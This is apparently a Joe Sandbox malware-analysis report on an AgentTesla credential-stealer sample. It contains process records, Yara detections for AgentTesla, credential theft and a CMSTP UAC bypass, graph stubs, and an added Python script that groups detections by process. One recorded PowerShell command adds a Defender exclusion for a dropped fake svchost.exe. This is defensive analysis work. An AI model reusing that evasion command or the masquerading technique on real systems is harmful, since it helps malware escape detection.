                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:36
                                                                        Start time:09:21:12
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                        Imagebase:
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:37
                                                                        Start time:09:21:12
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0x800000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        Target ID:38
                                                                        Start time:09:21:13
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0xe20000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:39
                                                                        Start time:09:21:13
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:40
                                                                        Start time:09:21:13
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:41
                                                                        Start time:09:21:15
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                        Imagebase:0x24f76110000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:true
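
The Yara matches listed under Target IDs 26, 27, 37 and 41 each name a memory-dump Source such as 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp. On this page the first dotted field is the Target ID in hex (0x1A = 26, 0x1B = 27, 0x25 = 37, 0x29 = 41, matching the record each line sits under), which makes it possible to answer the triage question "which processes actually hold the AgentTesla payload" without reading every record. The block below is an added example, not Joe Sandbox tooling: it parses the match lines copied from this section, joins them to the process table, and groups rules per process. Reading the fourth field as the address of the dumped region is an assumption (it is consistent with the values being below 4 GiB exactly for the WoW64 targets); the remaining fields are carried through uninterpreted.

```python
"""Cross-reference this report's Yara matches with its process table.

Added example, not Joe Sandbox code. Inferred from the page: field 0 of a Source
name is the Target ID in hex; field 3 is assumed to be the dump's address.
"""
import re
from collections import defaultdict

# Target ID -> (image name, Wow64 flag), copied from the process records above
# for the four processes that carry Yara matches.
PROCESSES = {26: ("MSBuild.exe", True), 27: ("svchost.exe", False),
             37: ("AddInProcess32.exe", True), 41: ("svchost.exe", False)}

# Yara match lines copied from this section of the report.
YARA_LINES = [
    "Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.1950991965.0000028E8033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
]

_LINE_RE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<source>[0-9A-Fa-f.]+)\.sdmp")


def parse_source(source):
    """Split a .sdmp name into hex fields; only target_id is verified against the page."""
    fields = [int(f, 16) for f in source.split(".")]
    return {"target_id": fields[0], "address": fields[3], "fields": fields}


def address_fits(address, wow64):
    """A 32-bit (WoW64) process cannot own user memory above 4 GiB."""
    return address < 2 ** 32 if wow64 else True


def parse_lines(lines):
    """(target_id, rule, address) for every parsable Yara match line."""
    out = []
    for line in lines:
        m = _LINE_RE.search(line)
        if not m:
            continue
        src = parse_source(m.group("source"))
        out.append((src["target_id"], m.group("rule").strip(), src["address"]))
    return out


def summarize(lines, processes):
    """Target ID -> image name, sorted distinct rules, and address sanity flag."""
    grouped = defaultdict(lambda: {"image": "<not in table>", "rules": set(), "fits": True})
    for tid, rule, addr in parse_lines(lines):
        name, wow64 = processes.get(tid, ("<not in table>", None))
        g = grouped[tid]
        g["image"] = name
        g["rules"].add(rule)
        g["fits"] = g["fits"] and address_fits(addr, wow64)
    return {tid: {"image": g["image"], "rules": sorted(g["rules"]), "addresses_fit": g["fits"]}
            for tid, g in sorted(grouped.items())}


def targets_with(rule_substring, lines, processes):
    """Target IDs whose matched rules contain the given substring."""
    return [tid for tid, g in summarize(lines, processes).items()
            if any(rule_substring in r for r in g["rules"])]


if __name__ == "__main__":
    for tid, g in summarize(YARA_LINES, PROCESSES).items():
        print(tid, g["image"], g["rules"], "addresses ok" if g["addresses_fit"] else "ADDRESS MISMATCH")
```

The grouping separates the two roles visible in this run: the AgentTesla and CredentialStealer rules fire only inside the two WoW64 .NET hosts (MSBuild.exe at 26, AddInProcess32.exe at 37), while the dropped svchost.exe copies (27 and 41) match only the CMSTP UAC-bypass rule. The address check is a cheap consistency test on the assumed field meaning: every 32-bit target's dump address sits below 4 GiB, which would not hold if that field were something else.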

                                                                        Target ID:42
                                                                        Start time:09:21:15
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:46
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:47
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:48
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                        Imagebase:0x9e0000
                                                                        File size:47'584 bytes
                                                                        MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        Target ID:49
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                        Imagebase:0x230000
                                                                        File size:47'584 bytes
                                                                        MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:50
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:51
                                                                        Start time:09:21:21
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:52
                                                                        Start time:09:21:24
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                                                                        Imagebase:0x8b0000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        • Detection: 0%, Virustotal
                                                                        Has exited:true

                                                                        Target ID:53
                                                                        Start time:09:21:24
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:55
                                                                        Start time:09:21:37
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                                                                        Imagebase:0x980000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:56
                                                                        Start time:09:21:37
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                          Execution Graph

                                                                          Execution Coverage:9%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:13
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 13447 7ffd9b8b47a6 13448 7ffd9b8b47d1 VirtualProtect 13447->13448 13450 7ffd9b8b4908 13448->13450 13451 7ffd9b8b433a 13452 7ffd9b8b4349 13451->13452 13457 7ffd9b8b3740 13452->13457 13454 7ffd9b8b3740 VirtualProtect 13456 7ffd9b8b44b0 13454->13456 13458 7ffd9b8b3749 VirtualProtect 13457->13458 13460 7ffd9b8b4425 13458->13460 13460->13454 13461 7ffd9b8b04ba 13462 7ffd9b8b0a30 FreeConsole 13461->13462 13464 7ffd9b8b0ae1 13462->13464

                                                                          Control-flow Graph

                                                                          control_flow_graph 284 7ffd9b8c0658-7ffd9b8c0693 287 7ffd9b8c0699-7ffd9b8c06ee call 7ffd9b8bc5f0 * 2 call 7ffd9b8b88f0 284->287 288 7ffd9b8c074e-7ffd9b8c0759 284->288 287->288 305 7ffd9b8c06f0-7ffd9b8c0714 287->305 292 7ffd9b8c075b-7ffd9b8c075d 288->292 293 7ffd9b8c075e-7ffd9b8c077a 288->293 292->293 298 7ffd9b8c077c-7ffd9b8c07a7 293->298 299 7ffd9b8c07c4-7ffd9b8c0806 call 7ffd9b8bc5f0 * 2 call 7ffd9b8b88f0 293->299 301 7ffd9b8c093b-7ffd9b8c096a 298->301 302 7ffd9b8c07ad-7ffd9b8c07c3 298->302 299->301 321 7ffd9b8c080c-7ffd9b8c082a 299->321 314 7ffd9b8c096c-7ffd9b8c0997 301->314 315 7ffd9b8c09b4-7ffd9b8c09f3 call 7ffd9b8bc5f0 * 2 call 7ffd9b8b88f0 301->315 302->299 307 7ffd9b8c0716-7ffd9b8c0726 305->307 308 7ffd9b8c0742-7ffd9b8c074d 305->308 307->288 311 7ffd9b8c0728-7ffd9b8c073f 307->311 311->308 318 7ffd9b8c0af7-7ffd9b8c0b29 314->318 319 7ffd9b8c099d-7ffd9b8c09b3 314->319 315->318 343 7ffd9b8c09f9-7ffd9b8c0a14 315->343 338 7ffd9b8c0b2b-7ffd9b8c0b56 318->338 339 7ffd9b8c0b73-7ffd9b8c0b9c call 7ffd9b8bc5f0 318->339 319->315 321->301 323 7ffd9b8c0830-7ffd9b8c084a 321->323 326 7ffd9b8c084c-7ffd9b8c084f 323->326 327 7ffd9b8c08a3-7ffd9b8c08a7 323->327 330 7ffd9b8c08d0-7ffd9b8c090f call 7ffd9b8bcfc0 326->330 331 7ffd9b8c0851-7ffd9b8c086a 326->331 333 7ffd9b8c0928-7ffd9b8c093a 327->333 334 7ffd9b8c08a9-7ffd9b8c08cf call 7ffd9b8b8c90 327->334 352 7ffd9b8c0911 330->352 336 7ffd9b8c086c-7ffd9b8c0881 331->336 337 7ffd9b8c0883-7ffd9b8c0894 331->337 334->330 344 7ffd9b8c0898-7ffd9b8c08a0 336->344 337->344 345 7ffd9b8c0c25-7ffd9b8c0c37 338->345 346 7ffd9b8c0b5c-7ffd9b8c0b6f 338->346 362 7ffd9b8c0b9e-7ffd9b8c0bdd 339->362 363 7ffd9b8c0c01-7ffd9b8c0c24 339->363 349 7ffd9b8c0a16-7ffd9b8c0a19 343->349 350 7ffd9b8c0a6d-7ffd9b8c0a74 343->350 351 7ffd9b8c08a2 344->351 344->352 364 7ffd9b8c0c79-7ffd9b8c0c87 345->364 365 7ffd9b8c0c39-7ffd9b8c0c49 345->365 346->339 357 7ffd9b8c0a1b-7ffd9b8c0a39 349->357 358 7ffd9b8c0a9a-7ffd9b8c0aa9 349->358 350->318 359 7ffd9b8c0a7a-7ffd9b8c0a97 350->359 351->327 352->301 356 7ffd9b8c0913-7ffd9b8c0926 352->356 356->333 361 7ffd9b8c0aaa-7ffd9b8c0abe call 7ffd9b8bcfc0 357->361 366 7ffd9b8c0a3b-7ffd9b8c0a40 357->366 358->361 359->358 374 7ffd9b8c0ac1-7ffd9b8c0acd 361->374 369 7ffd9b8c0c4e-7ffd9b8c0c5a 362->369 390 7ffd9b8c0bdf-7ffd9b8c0be4 362->390 363->345 370 7ffd9b8c0c8d-7ffd9b8c0ca1 364->370 371 7ffd9b8c0de3-7ffd9b8c0df9 364->371 365->369 373 7ffd9b8c0a42-7ffd9b8c0a66 call 7ffd9b8b8c90 366->373 366->374 377 7ffd9b8c0c5c-7ffd9b8c0c63 369->377 378 7ffd9b8c0ca4-7ffd9b8c0cdf call 7ffd9b8bc5f0 * 2 call 7ffd9b8be750 369->378 370->378 388 7ffd9b8c0dfb-7ffd9b8c0e0f 371->388 389 7ffd9b8c0dfa 371->389 373->350 374->318 379 7ffd9b8c0acf-7ffd9b8c0af6 374->379 381 7ffd9b8c0c65-7ffd9b8c0c76 377->381 404 7ffd9b8c0cf9-7ffd9b8c0d04 378->404 405 7ffd9b8c0ce1-7ffd9b8c0cf7 378->405 381->364 399 7ffd9b8c0e11-7ffd9b8c0e49 388->399 389->388 390->381 394 7ffd9b8c0be6-7ffd9b8c0c00 call 7ffd9b8b8c90 390->394 402 7ffd9b8c0e4b-7ffd9b8c0e5d call 7ffd9b8b02a0 399->402 403 7ffd9b8c0e5f 399->403 408 7ffd9b8c0e64-7ffd9b8c0e66 402->408 403->408 414 7ffd9b8c0d16 404->414 415 7ffd9b8c0d06-7ffd9b8c0d14 404->415 405->404 411 7ffd9b8c0e68-7ffd9b8c0e73 408->411 412 7ffd9b8c0e7a-7ffd9b8c0ef1 408->412 411->412 437 7ffd9b8c0fd8-7ffd9b8c0fdf 412->437 438 7ffd9b8c0ef7-7ffd9b8c0f6f 412->438 417 7ffd9b8c0d18-7ffd9b8c0d1d 414->417 415->417 418 7ffd9b8c0d40-7ffd9b8c0d56 417->418 419 7ffd9b8c0d1f-7ffd9b8c0d3e call 7ffd9b8b3908 417->419 426 7ffd9b8c0d58-7ffd9b8c0d63 418->426 427 7ffd9b8c0d6a-7ffd9b8c0d7f call 7ffd9b8bf140 418->427 425 7ffd9b8c0d83-7ffd9b8c0d89 419->425 425->389 429 7ffd9b8c0d8b-7ffd9b8c0d90 425->429 426->427 427->425 429->399 431 7ffd9b8c0d92-7ffd9b8c0dc0 call 7ffd9b8b8c90 call 7ffd9b8b88f0 429->431 431->371 443 7ffd9b8c0dc2-7ffd9b8c0de2 431->443 439 7ffd9b8c0ffc-7ffd9b8c100c 437->439 440 7ffd9b8c0fe1-7ffd9b8c0fee 437->440 452 7ffd9b8c0fcf-7ffd9b8c0fd7 call 7ffd9b8c1024 438->452 453 7ffd9b8c0f71-7ffd9b8c0f77 call 7ffd9b8baa30 438->453 446 7ffd9b8c1012-7ffd9b8c1023 439->446 440->439 445 7ffd9b8c0ff0-7ffd9b8c0ffa 440->445 445->439 452->437 457 7ffd9b8c0f7c-7ffd9b8c0fce 453->457 457->452
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x6f/$x6f/
                                                                          • API String ID: 0-3524692040
                                                                          • Opcode ID: c4e2273b221ddd997c052ec2f0771830121e8ac993d03f576aad17dd4ab1ee58
                                                                          • Instruction ID: 07a03b019612da27e76632c77f5667a82b06d2a37358a20c9be05ea44d25f8e1
                                                                          • Opcode Fuzzy Hash: c4e2273b221ddd997c052ec2f0771830121e8ac993d03f576aad17dd4ab1ee58
                                                                          • Instruction Fuzzy Hash: EE727A3061DB4D4FD769EB28C4A04B577E1FF99300B0546BEE48AC72A6DE34E946CB81

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: fish
                                                                          • API String ID: 0-1064584243
                                                                          • Opcode ID: db2798f02d1b48f832891f12c287e572bec2b9d8a3ad20c24142c2425e7ae081
                                                                          • Instruction ID: 4cbf0724508f69e47928eb529577955daadd0f30f3a27b1e7ab44baae179c2a4
                                                                          • Opcode Fuzzy Hash: db2798f02d1b48f832891f12c287e572bec2b9d8a3ad20c24142c2425e7ae081
                                                                          • Instruction Fuzzy Hash: BE91E931B1DA1D0FE76CEB7898754B9B3D1FB59310B01467EE44BC3296EE24B9428B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9913b86f4533616e2163a5aac24c83467278c3d124331cbc47fe88fc6fc0b602
                                                                          • Instruction ID: 4925671e97d51af4d6226765ec484e5185b53c82def5086900a9ceab0af2e9a8
                                                                          • Opcode Fuzzy Hash: 9913b86f4533616e2163a5aac24c83467278c3d124331cbc47fe88fc6fc0b602
                                                                          • Instruction Fuzzy Hash: 10A2683060DB5A4FE769DF38C4A44A5B7E1FF89301B1545BED48AC72A2DE34E946CB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f0c2b06de95dbee1ae3e683a59344763ef98003cd555492227cdee767cce2016
                                                                          • Instruction ID: abef869682d28f11671815bbb35297065e0d29bcfd286ee4fa13aab2dce068c7
                                                                          • Opcode Fuzzy Hash: f0c2b06de95dbee1ae3e683a59344763ef98003cd555492227cdee767cce2016
                                                                          • Instruction Fuzzy Hash: 6F52F930B09A1D4FDBA8DB68D465A7977E1FF58301F1501BEE04EC36A2DE24ED428B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9bf342b64b0ff932ada13122418f46e208a157e887db4ca4c872d675f8f46c5e
                                                                          • Instruction ID: 56b02c09f5435df91861d2ed920cdef8ea1b7bb62a4cc2161a30ae03bf758b98
                                                                          • Opcode Fuzzy Hash: 9bf342b64b0ff932ada13122418f46e208a157e887db4ca4c872d675f8f46c5e
                                                                          • Instruction Fuzzy Hash: B4227071E1962E8FEBA8DF64C8657A9B7B1FF49300F1101BAD01D97295CB356A81CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 532a111537e20189ebdcc29fec5320e08c8fbaac493048190b61f516820b76a4
                                                                          • Instruction ID: 8333431bd690e5ba1b107b481581d7af2f42f6572c29d42dc60e912e5f82e723
                                                                          • Opcode Fuzzy Hash: 532a111537e20189ebdcc29fec5320e08c8fbaac493048190b61f516820b76a4
                                                                          • Instruction Fuzzy Hash: 18D18C3160DB9A4FE32DCB3884A11B5B7E1FFD9301B05467EE4C6C72A1DA24E546CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
